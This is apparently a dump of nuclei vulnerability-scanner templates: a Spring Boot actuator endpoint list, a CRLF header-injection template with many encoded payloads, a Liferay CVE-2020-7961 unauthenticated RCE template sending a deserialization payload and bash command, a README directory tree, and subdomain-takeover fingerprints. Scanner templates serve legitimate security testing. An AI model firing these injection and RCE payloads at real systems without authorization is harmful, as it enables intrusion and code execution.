"{{BaseURL}}/actuator/env" 21 | - "{{BaseURL}}/actuator/events" 22 | - "{{BaseURL}}/actuator/exportRegisteredServices" 23 | - "{{BaseURL}}/actuator/features" 24 | - "{{BaseURL}}/actuator/flyway" 25 | - "{{BaseURL}}/actuator/health" 26 | - "{{BaseURL}}/actuator/healthcheck" 27 | - "{{BaseURL}}/actuator/heapdump" 28 | - "{{BaseURL}}/actuator/httptrace" 29 | - "{{BaseURL}}/actuator/hystrix.stream" 30 | - "{{BaseURL}}/actuator/info" 31 | - "{{BaseURL}}/actuator/integrationgraph" 32 | - "{{BaseURL}}/actuator/jolokia" 33 | - "{{BaseURL}}/actuator/liquibase" 34 | - "{{BaseURL}}/actuator/logfile" 35 | - "{{BaseURL}}/actuator/loggers" 36 
| - "{{BaseURL}}/actuator/loggingConfig" 37 | - "{{BaseURL}}/actuator/management" 38 | - "{{BaseURL}}/actuator/mappings" 39 | - "{{BaseURL}}/actuator/metrics" 40 | - "{{BaseURL}}/actuator/refresh" 41 | - "{{BaseURL}}/actuator/registeredServices" 42 | - "{{BaseURL}}/actuator/releaseAttributes" 43 | - "{{BaseURL}}/actuator/resolveAttributes" 44 | - "{{BaseURL}}/actuator/scheduledtasks" 45 | - "{{BaseURL}}/actuator/sessions" 46 | - "{{BaseURL}}/actuator/shutdown" 47 | - "{{BaseURL}}/actuator/springWebflow" 48 | - "{{BaseURL}}/actuator/sso" 49 | - "{{BaseURL}}/actuator/ssoSessions" 50 | - "{{BaseURL}}/actuator/statistics" 51 | - "{{BaseURL}}/actuator/status" 52 | - "{{BaseURL}}/actuator/threaddump" 53 | - "{{BaseURL}}/actuator/trace" 54 | - "{{BaseURL}}/auditevents" 55 | - "{{BaseURL}}/autoconfig" 56 | - "{{BaseURL}}/beans" 57 | - "{{BaseURL}}/cloudfoundryapplication" 58 | - "{{BaseURL}}/configprops" 59 | - "{{BaseURL}}/dump" 60 | - "{{BaseURL}}/env" 61 | - "{{BaseURL}}/health" 62 | - "{{BaseURL}}/heapdump" 63 | - "{{BaseURL}}/hystrix.stream" 64 | - "{{BaseURL}}/info" 65 | - "{{BaseURL}}/jolokia" 66 | - "{{BaseURL}}/jolokia/list" 67 | - "{{BaseURL}}:8090/jolokia" 68 | - "{{BaseURL}}:8090/jolokia/list" 69 | - "{{BaseURL}}/loggers" 70 | - "{{BaseURL}}/management" 71 | - "{{BaseURL}}/mappings" 72 | - "{{BaseURL}}/metrics" 73 | - "{{BaseURL}}/threaddump" 74 | - "{{BaseURL}}/trace" 75 | matchers-condition: and 76 | matchers: 77 | - type: word 78 | part: body 79 | words: 80 | - "method" 81 | - "spring" 82 | - "TYPE" 83 | - "system" 84 | - "database" 85 | - "cron" 86 | - "reloadByURL" 87 | - "JMXConfigurator" 88 | - "JMImplementation" 89 | - "EnvironmentManager" 90 | condition: or 91 | - type: status 92 | status: 93 | - 200 94 | - type: word 95 | words: 96 | - "X-Application-Context" 97 | - "application/json" 98 | - "application/vnd.spring-boot.actuator.v2+json" 99 | - "hprof" 100 | condition: or 101 | part: header 102 | 
-------------------------------------------------------------------------------- /vulnerabilities/crlf-injection.yaml: -------------------------------------------------------------------------------- 1 | id: crlf-injection 2 | 3 | info: 4 | name: CRLF injection 5 | author: melbadry9 & nadino & xElkomy 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/%0D%0ASet-Cookie:crlfinjection=crlfinjection" 12 | - "{{BaseURL}}/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection" # unicode bypass 13 | - "{{BaseURL}}/%0DSet-Cookie:crlfinjection=crlfinjection" 14 | - "{{BaseURL}}/%0ASet-Cookie:crlfinjection=crlfinjection" 15 | - "{{BaseURL}}/%3F%0DSet-Cookie%3Acrlfinjection=crlfinjection" 16 | - "{{BaseURL}}/%0ASet-Cookie%3Acrlfinjection/.." # Apache 17 | - "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection" # CVE-2016-4975 18 | - "{{BaseURL}}/?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlf
injection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=c
rlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection" 19 | 20 | matchers: 21 | - type: regex 22 | regex: 23 | - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' 24 | part: header 25 | -------------------------------------------------------------------------------- /cves/CVE-2020-7961.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-7961 2 | 3 | info: 4 | name: Liferay Portal Unauthenticated RCE 5 | author: dwisiswant0 6 | severity: high 7 | 8 | requests: 9 | - method: POST 10 | path: 11 | - "{{BaseURL}}/api/jsonws/invoke" 12 | - "{{BaseURL}}:8080/api/jsonws/invoke" 13 | headers: 14 | User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55" 15 | Connection: "close" 16 | Content-Type: "application/x-www-form-urlencoded" 17 | cmd2: "bash -c 'echo \"bm9uZXhpc3RlbnQ6MTMzNwo=\" | base64 -d'" 18 | body: "{\"p_auth\":\"AdsXeCqz\",\"tableId%3d1\":\"\",\"formDate\":\"1526638413000\",\"columnId\":\"123\",\"defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\":\"{\\\"userOverridesAsString\\\":\\\"HexAsciiSerializedMap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}\",\"name\":\"A\",\"cmd\":\"{\\\"/expandocolumn/update-column\\\":{}}\",\"type\":\"1\"}" 19 | matchers: 20 | - type: word 21 | words: 22 | - "nonexistent:1337" 23 | part: body -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/nuclei) which power the actual scanning engine. 
This repository stores the various templates for the scanner, both those provided by our team and those contributed by the community. We hope that you will also contribute by sending templates via **pull requests** to grow the list. 2 | 3 |

4 | Template Directory 5 | 6 | ``` 7 | ├── LICENSE 8 | ├── README.md 9 | ├── basic-detections 10 | │   ├── basic-xss-prober.yaml 11 | │   └── general-tokens.yaml 12 | ├── brute-force 13 | │   └── tomcat-manager-bruteforce.yaml 14 | ├── cves 15 | │   ├── CVE-2017-10075.yaml 16 | │   ├── CVE-2017-7529.yaml 17 | │   ├── CVE-2017-9506.yaml 18 | │   ├── CVE-2017-9841.yaml 19 | │   ├── CVE-2018-0296.yaml 20 | │   ├── CVE-2018-1000129.yaml 21 | │   ├── CVE-2018-11409.yaml 22 | │   ├── CVE-2018-11759.yaml 23 | │   ├── CVE-2018-1247.yaml 24 | │   ├── CVE-2018-1271.yaml 25 | │   ├── CVE-2018-13379.yaml 26 | │   ├── CVE-2018-14728.yaml 27 | │   ├── CVE-2018-16341.yaml 28 | │   ├── CVE-2018-18069.yaml 29 | │   ├── CVE-2018-19439.yaml 30 | │   ├── CVE-2018-20824.yaml 31 | │   ├── CVE-2018-2791.yaml 32 | │   ├── CVE-2018-3714.yaml 33 | │   ├── CVE-2018-3760.yaml 34 | │   ├── CVE-2018-5230.yaml 35 | │   ├── CVE-2018-7490.yaml 36 | │   ├── CVE-2019-10475.yaml 37 | │   ├── CVE-2019-11510.yaml 38 | │   ├── CVE-2019-12314.yaml 39 | │   ├── CVE-2019-14322.yaml 40 | │   ├── CVE-2019-14974.yaml 41 | │   ├── CVE-2019-15043.yaml 42 | │   ├── CVE-2019-16759.yaml 43 | │   ├── CVE-2019-17382.yaml 44 | │   ├── CVE-2019-18394.yaml 45 | │   ├── CVE-2019-19368.yaml 46 | │   ├── CVE-2019-19781.yaml 47 | │   ├── CVE-2019-19908.yaml 48 | │   ├── CVE-2019-19985.yaml 49 | │   ├── CVE-2019-2588.yaml 50 | │   ├── CVE-2019-3396.yaml 51 | │   ├── CVE-2019-3799.yaml 52 | │   ├── CVE-2019-5418.yaml 53 | │   ├── CVE-2019-8449.yaml 54 | │   ├── CVE-2019-8451.yaml 55 | │   ├── CVE-2019-8903.yaml 56 | │   ├── CVE-2019-8982.yaml 57 | │   ├── CVE-2020-10199.yaml 58 | │   ├── CVE-2020-10204.yaml 59 | │   ├── CVE-2020-1147.yaml 60 | │   ├── CVE-2020-12720.yaml 61 | │   ├── CVE-2020-13167.yaml 62 | │   ├── CVE-2020-2096.yaml 63 | │   ├── CVE-2020-3187.yaml 64 | │   ├── CVE-2020-3452.yaml 65 | │   ├── CVE-2020-5284.yaml 66 | │   ├── CVE-2020-5405.yaml 67 | │   ├── CVE-2020-5410.yaml 68 | │   ├── CVE-2020-5902.yaml 
69 | │   ├── CVE-2020-6287.yaml 70 | │   ├── CVE-2020-7209.yaml 71 | │   ├── CVE-2020-7961.yaml 72 | │   ├── CVE-2020-8091.yaml 73 | │   ├── CVE-2020-8115.yaml 74 | │   ├── CVE-2020-8191.yaml 75 | │   ├── CVE-2020-8193.yaml 76 | │   ├── CVE-2020-8194.yaml 77 | │   ├── CVE-2020-8512.yaml 78 | │   ├── CVE-2020-8982.yaml 79 | │   ├── CVE-2020-9484.yaml 80 | │   └── CVE-2020-9757.yaml 81 | ├── dns 82 | │   ├── azure-takeover-detection.yaml 83 | │   ├── cname-service-detector.yaml 84 | │   ├── dead-host-with-cname.yaml 85 | │   └── servfail-refused-hosts.yaml 86 | ├── files 87 | │   ├── apc-info.yaml 88 | │   ├── cgi-test-page.yaml 89 | │   ├── debug-pprof.yaml 90 | │   ├── dir-listing.yaml 91 | │   ├── docker-registry.yaml 92 | │   ├── drupal-install.yaml 93 | │   ├── elasticsearch.yaml 94 | │   ├── exposed-kibana.yaml 95 | │   ├── exposed-svn.yaml 96 | │   ├── filezilla.yaml 97 | │   ├── firebase-detect.yaml 98 | │   ├── git-config.yaml 99 | │   ├── htaccess-config.yaml 100 | │   ├── jkstatus-manager.yaml 101 | │   ├── jolokia.yaml 102 | │   ├── laravel-env.yaml 103 | │   ├── lazy-file.yaml 104 | │   ├── phpinfo.yaml 105 | │   ├── public-tomcat-instance.yaml 106 | │   ├── security.txt.yaml 107 | │   ├── server-status-localhost.yaml 108 | │   ├── telerik-dialoghandler-detect.yaml 109 | │   ├── telerik-fileupload-detect.yaml 110 | │   ├── tomcat-scripts.yaml 111 | │   ├── wadl-files.yaml 112 | │   ├── web-config.yaml 113 | │   ├── wordpress-directory-listing.yaml 114 | │   ├── wordpress-user-enumeration.yaml 115 | │   ├── wp-xmlrpc.yaml 116 | │   └── zip-backup-files.yaml 117 | ├── panels 118 | │   ├── atlassian-crowd-panel.yaml 119 | │   ├── cisco-asa-panel.yaml 120 | │   ├── citrix-adc-gateway-detect.yaml 121 | │   ├── compal.yaml 122 | │   ├── crxde.yaml 123 | │   ├── docker-api.yaml 124 | │   ├── fortinet-fortigate-panel.yaml 125 | │   ├── globalprotect-panel.yaml 126 | │   ├── grafana-detect.yaml 127 | │   ├── jenkins-asyncpeople.yaml 128 | │   ├── jmx-console.yaml 
129 | │   ├── kubernetes-pods.yaml 130 | │   ├── mongo-express-web-gui.yaml 131 | │   ├── parallels-html-client.yaml 132 | │   ├── phpmyadmin-panel.yaml 133 | │   ├── pulse-secure-panel.yaml 134 | │   ├── rabbitmq-dashboard.yaml 135 | │   ├── sap-netweaver-detect.yaml 136 | │   ├── sap-recon-detect.yaml 137 | │   ├── sophos-fw-version-detect.yaml 138 | │   ├── supervpn-panel.yaml 139 | │   ├── swagger-panel.yaml 140 | │   ├── tikiwiki-cms.yaml 141 | │   ├── weave-scope-dashboard-detect.yaml 142 | │   └── webeditors.yaml 143 | ├── payloads 144 | │   └── CVE-2020-6287.xml 145 | ├── security-misconfiguration 146 | │   ├── basic-cors-flash.yaml 147 | │   ├── basic-cors.yaml 148 | │   ├── front-page-misconfig.yaml 149 | │   ├── jira-service-desk-signup.yaml 150 | │   ├── jira-unauthenticated-dashboards.yaml 151 | │   ├── jira-unauthenticated-popular-filters.yaml 152 | │   ├── jira-unauthenticated-projects.yaml 153 | │   ├── jira-unauthenticated-user-picker.yaml 154 | │   ├── rabbitmq-default-admin.yaml 155 | │   ├── rack-mini-profiler.yaml 156 | │   ├── springboot-detect.yaml 157 | │   └── wamp-xdebug-detect.yaml 158 | ├── subdomain-takeover 159 | │   ├── detect-all-takeovers.yaml 160 | │   └── s3-subtakeover.yaml 161 | ├── technologies 162 | │   ├── bigip-config-utility-detect.yaml 163 | │   ├── citrix-vpn-detect.yaml 164 | │   ├── clockwork-php-page.yaml 165 | │   ├── couchdb-detect.yaml 166 | │   ├── github-enterprise-detect.yaml 167 | │   ├── gitlab-detect.yaml 168 | │   ├── graphql.yaml 169 | │   ├── home-assistant.yaml 170 | │   ├── jaspersoft-detect.yaml 171 | │   ├── jira-detect.yaml 172 | │   ├── liferay-portal-detect.yaml 173 | │   ├── linkerd-badrule-detect.yaml 174 | │   ├── linkerd-ssrf-detect.yaml 175 | │   ├── netsweeper-webadmin-detect.yaml 176 | │   ├── ntlm-directories.yaml 177 | │   ├── prometheus-exposed-panel.yaml 178 | │   ├── s3-detect.yaml 179 | │   ├── sap-netweaver-as-java-detect.yaml 180 | │   ├── sap-netweaver-detect.yaml 181 | │   ├── 
sql-server-reporting.yaml 182 | │   ├── tech-detect.yaml 183 | │   ├── weblogic-detect.yaml 184 | │   └── werkzeug-debugger-detect.yaml 185 | ├── tokens 186 | │   ├── amazon-mws-auth-token-value.yaml 187 | │   ├── aws-access-key-value.yaml 188 | │   ├── google-api-key.yaml 189 | │   ├── http-username-password.yaml 190 | │   ├── mailchimp-api-key.yaml 191 | │   └── slack-access-token.yaml 192 | ├── vulnerabilities 193 | │   ├── cached-aem-pages.yaml 194 | │   ├── couchdb-adminparty.yaml 195 | │   ├── crlf-injection.yaml 196 | │   ├── discourse-xss.yaml 197 | │   ├── git-config-nginxoffbyslash.yaml 198 | │   ├── ibm-infoprint-directory-traversal.yaml 199 | │   ├── microstrategy-ssrf.yaml 200 | │   ├── moodle-filter-jmol-lfi.yaml 201 | │   ├── moodle-filter-jmol-xss.yaml 202 | │   ├── nginx-module-vts-xss.yaml 203 | │   ├── open-redirect.yaml 204 | │   ├── oracle-ebs-bispgraph-file-access.yaml 205 | │   ├── pdf-signer-ssti-to-rce.yaml 206 | │   ├── rce-shellshock-user-agent.yaml 207 | │   ├── rce-via-java-deserialization.yaml 208 | │   ├── springboot-actuators-jolokia-xxe.yaml 209 | │   ├── symfony-debugmode.yaml 210 | │   ├── tikiwiki-reflected-xss.yaml 211 | │   ├── tomcat-manager-pathnormalization.yaml 212 | │   ├── twig-php-ssti.yaml 213 | │   ├── wordpress-duplicator-path-traversal.yaml 214 | │   ├── wordpress-wordfence-xss.yaml 215 | │   └── x-forwarded-host-injection.yaml 216 | └── workflows 217 | ├── bigip-pwner-workflow.yaml 218 | ├── jira-exploitaiton-workflow.yaml 219 | ├── liferay-rce-workflow.yaml 220 | ├── netsweeper-preauth-rce-workflow.yaml 221 | ├── rabbitmq-workflow.yaml 222 | ├── sap-netweaver-workflow.yaml 223 | └── springboot-pwner-workflow.yaml 224 | ``` 225 | 226 |
227 | 228 | 13 directories, **204 templates**. 229 | 230 | Please visit https://nuclei.projectdiscovery.io for detailed documentation on building your own custom templates, along with many example templates for easy understanding. 231 | 232 | ------ 233 | **Notes:** 234 | 1. Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/)) to validate new templates when sending pull requests. 235 | 2. Use YAML Formatter (e.g. [jsonformatter](https://jsonformatter.org/yaml-formatter)) to format new templates when sending pull requests. 236 | 237 | Thanks again for your contributions and for keeping the community vibrant. :heart: 238 | -------------------------------------------------------------------------------- /subdomain-takeover/detect-all-takeovers.yaml: -------------------------------------------------------------------------------- 1 | id: detect-all-takeovers 2 | 3 | info: 4 | name: Subdomain Takeover Detection 5 | author: "melbadry9 & pxmme1337" 6 | severity: high 7 | 8 | # Update this list with matchers for new takeovers 9 | # Do not delete the other takeover template files 10 | # https://github.com/EdOverflow/can-i-take-over-xyz 11 | # You need to claim the subdomain / CNAME of the subdomain to confirm the takeover. 12 | # Do not report subdomain takeover issues based on detection alone. 13 | # Total number of services: 71 14 | 15 | requests: 16 | - method: GET 17 | path: 18 | - "{{BaseURL}}/" 19 | matchers-condition: or 20 | 21 | matchers: 22 | - type: word 23 | name: acquia 24 | words: 25 | - If you are an Acquia Cloud customer and expect to see your site at this address 26 | - The site you are looking for could not be found. 27 | 28 | - type: word 29 | name: agilecrm 30 | words: 31 | - Sorry, this page is no longer available. 32 | 33 | - type: word 34 | name: airee 35 | words: 36 | - Ошибка 402. Сервис Айри.рф не оплачен 37 | 38 | - type: word 39 | name: aftership 40 | words: 41 | - Oops.

The page you're looking for doesn't 42 | exist. 43 | 44 | - type: word 45 | name: aha 46 | words: 47 | - There is no portal here ... sending you back to Aha! 48 | 49 | - type: word 50 | name: anima 51 | words: 52 | - "If this is your website and you've just created it, try refreshing in a minute" 53 | 54 | - type: word 55 | name: aws-bucket 56 | words: 57 | - "The specified bucket does not exist" 58 | 59 | - type: word 60 | name: bigcartel 61 | words: 62 | - "

Oops! We couldn’t find that page.

" 63 | 64 | - type: word 65 | name: bitbucket 66 | words: 67 | - The page you have requested does not exist 68 | - Repository not found 69 | 70 | - type: word 71 | name: brightcove 72 | words: 73 | - '' 74 | 75 | - type: word 76 | name: campaignmonitor 77 | words: 78 | - "Trying to access your account?" 79 | - or 97 | - 404 Not Found
98 | 99 | - type: word 100 | name: fastly 101 | words: 102 | - "Fastly error: unknown domain:" 103 | 104 | - type: word 105 | name: feedpress 106 | words: 107 | - The feed has not been found. 108 | 109 | - type: word 110 | name: frontify 111 | words: 112 | - 404 - Page Not Found 113 | - Oops… looks like you got lost 114 | condition: and 115 | part: body 116 | 117 | - type: word 118 | name: gemfury 119 | words: 120 | - "404: This page could not be found." 121 | 122 | - type: word 123 | name: getresponse 124 | words: 125 | - With GetResponse Landing Pages, lead generation has never been easier 126 | 127 | - type: word 128 | name: ghost 129 | words: 130 | - The thing you were looking for is no longer here 131 | - The thing you were looking for is no longer here, or never was 132 | 133 | - type: word 134 | name: github 135 | words: 136 | - There isn't a GitHub Pages site here. 137 | - For root URLs (like http://example.com/) you must provide an index.html file 138 | 139 | - type: word 140 | name: hatenablog 141 | words: 142 | - 404 Blog is not found 143 | - Sorry, we can't find the page you're looking for. 144 | 145 | - type: word 146 | name: helpjuice 147 | words: 148 | - We could not find what you're looking for. 149 | 150 | - type: word 151 | name: helprace 152 | words: 153 | - Alias not configured! 154 | - Admin of this Helprace account needs to set up domain alias 155 | - "(see Step 2 here: Using your own domain with Helprace)." 156 | 157 | - type: word 158 | name: helpscout 159 | words: 160 | - "No settings were found for this company:" 161 | 162 | - type: word 163 | name: heroku 164 | words: 165 | - There's nothing here, yet. 166 | - herokucdn.com/error-pages/no-such-app.html 167 | - "No such app" 168 | 169 | - type: word 170 | name: hubspot 171 | words: 172 | - Domain not found 173 | - does not exist in our system 174 | 175 | - type: word 176 | name: intercom 177 | words: 178 | - This page is reserved for artistic dogs. 179 | -

Uh oh. That page doesn’t exist.

180 | 181 | - type: word 182 | name: jazzhr 183 | words: 184 | - This account no longer active 185 | 186 | - type: word 187 | name: jetbrains 188 | words: 189 | - is not a registered InCloud YouTrack. 190 | 191 | - type: word 192 | name: kinsta 193 | words: 194 | - No Site For Domain 195 | 196 | - type: word 197 | name: landingi 198 | words: 199 | - It looks like you're lost 200 | - The page you are looking for is not found 201 | 202 | - type: word 203 | name: launchrock 204 | words: 205 | - It looks like you may have taken a wrong turn somewhere. Don't worry...it happens 206 | to all of us. 207 | 208 | - type: word 209 | name: mashery 210 | words: 211 | - Unrecognized domain 212 | 213 | - type: word 214 | name: ngrok 215 | words: 216 | - ngrok.io not found 217 | - Tunnel *.ngrok.io not found 218 | 219 | - type: word 220 | name: pantheon.io 221 | words: 222 | - "The gods are wise, but do not know of the site which you seek." 223 | 224 | - type: word 225 | name: pingdom 226 | words: 227 | - Public Report Not Activated 228 | - This public report page has not been activated by the user 229 | 230 | - type: word 231 | name: proposify 232 | words: 233 | - If you need immediate assistance, please contact
Error 404: Page Not Found" 287 | 288 | - type: word 289 | name: teamwork 290 | words: 291 | - Oops - We didn't find your site. 292 | 293 | - type: word 294 | name: thinkific 295 | words: 296 | - You may have mistyped the address or the page may have moved. 297 | 298 | - type: word 299 | name: tictail 300 | words: 301 | - Building a brand of your own? 302 | - 'to target URL: The page you are looking for doesn't exist or has been 345 | moved.

346 | 347 | - type: word 348 | name: wishpond 349 | words: 350 | - https://www.wishpond.com/404?campaign=true 351 | 352 | - type: word 353 | name: wordpress 354 | words: 355 | - Do you want to register 356 | 357 | - type: regex 358 | name: worksites 359 | regex: 360 | - "(?:Company Not Found|you’re looking for doesn’t exist)" 361 | 362 | - type: word 363 | name: wufoo 364 | words: 365 | - Profile not found 366 | - Hmmm....something is not right. 367 | 368 | - type: word 369 | name: zendesk 370 | words: 371 | - this help center no longer exists 372 | 373 | - type: word 374 | name: readthedocs 375 | words: 376 | - unknown to Read the Docs 377 | 378 | - type: word 379 | name: tilda 380 | words: 381 | - Please renew your subscription 382 | - Please go to the site settings and put the domain name in the Domain tab. 383 | 384 | - type: word 385 | name: smart-jobboard 386 | words: 387 | - This job board website is either expired or its domain name is invalid. --------------------------------------------------------------------------------